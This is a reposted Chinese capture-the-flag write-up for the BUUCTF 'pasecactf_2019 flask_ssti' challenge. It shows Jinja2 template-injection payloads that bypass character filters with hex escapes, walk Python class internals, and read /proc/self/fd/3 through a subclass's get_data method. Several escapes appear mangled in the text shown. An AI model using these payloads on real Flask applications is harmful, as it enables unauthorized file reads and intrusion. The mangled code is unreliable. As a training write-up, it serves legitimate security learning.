buuctf pasecactf_2019]flask_ssti-解题步骤详解

admin
admin
admin
102063
文章
87
评论
2022年4月28日09:16:46评论88 views字数 685阅读2分17秒阅读模式

buuctf pasecactf_2019]flask_ssti-解题步骤详解

1.测试存在ssti

buuctf pasecactf_2019]flask_ssti-解题步骤详解

2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过

buuctf pasecactf_2019]flask_ssti-解题步骤详解

3.寻找基类

buuctf pasecactf_2019]flask_ssti-解题步骤详解


4.寻找可用引用

{undefined{()["x5fx5fclassx5fx5f"]["x5fx5fbasesx5fx5f"][0]["x5fx5fsubclassesx5fx5f"]()}}

buuctf pasecactf_2019]flask_ssti-解题步骤详解

5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法:

buuctf pasecactf_2019]flask_ssti-解题步骤详解

{undefined{()["x5Fx5Fclassx5Fx5F"]["x5Fx5Fbasesx5Fx5F"][0]["x5Fx5Fsubclassesx5Fx5F"]()[91]["getx5Fdata"](0, "/proc/self/fd/3")}}

buuctf pasecactf_2019]flask_ssti-解题步骤详解

自己的一些总结:使用[]好像可以自动补.号

以下是等价的

{{"".__class__}}{{""["x5fx5fclassx5fx5f"]}}

原文来自CSDN博主「qq_40800734」|侵





buuctf pasecactf_2019]flask_ssti-解题步骤详解

buuctf pasecactf_2019]flask_ssti-解题步骤详解


中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。

为方便大家沟通,中电运行开通“中电运行交流群”,诚挚欢迎能源企业和相关人士,以及对网络安全感兴趣的群体加入本群,真诚交流,互相学习buuctf pasecactf_2019]flask_ssti-解题步骤详解buuctf pasecactf_2019]flask_ssti-解题步骤详解。想加入我们就给我们留言吧buuctf pasecactf_2019]flask_ssti-解题步骤详解

buuctf pasecactf_2019]flask_ssti-解题步骤详解

buuctf pasecactf_2019]flask_ssti-解题步骤详解

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!

buuctf pasecactf_2019]flask_ssti-解题步骤详解

原文始发于微信公众号(寰宇卫士):buuctf pasecactf_2019]flask_ssti-解题步骤详解

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月28日09:16:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   buuctf pasecactf_2019]flask_ssti-解题步骤详解http://cn-sec.com/archives/951547.html

发表评论

匿名网友 填写信息